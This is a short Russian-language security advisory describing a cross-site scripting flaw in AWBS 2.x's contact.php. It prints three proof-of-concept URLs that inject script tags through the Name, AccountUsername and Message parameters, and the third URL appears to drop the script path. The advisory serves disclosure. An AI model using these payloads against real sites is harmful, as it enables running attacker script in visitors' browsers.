• Партнер

  • Программа: AWBS 2.x

    Уязвимость позволяет удаленному
    пользователю произвести XSS нападение.
    Уязвимость существует из-за недостаточной
    обработки входных данных в параметрах "Name"
    и "AccountUsername" в сценарии contact.php.
    Удаленный пользователь может с помощью
    специально сформированного запроса
    выполнить произвольный код сценария в
    браузере жертвы в контексте безопасности
    уязвимого сайта.

    Пример:

    http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS
    Vulnerability')%3B</script>&EmailAddress= 1&AccountUsername=1&Message=1

    http://[site adres]/contact.php?action=submit&Name= 1&EmailAddress=1&AccountUsername='><script>alert('XSS
    Vulnerability')%3B</script>&Message=1

    http://[site adres]/action=submit&Name=1&EmailAddress= 1&AccountUsername=1&Message=</textarea>
    <script>alert('XSS Vulnerability')%3B</script>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии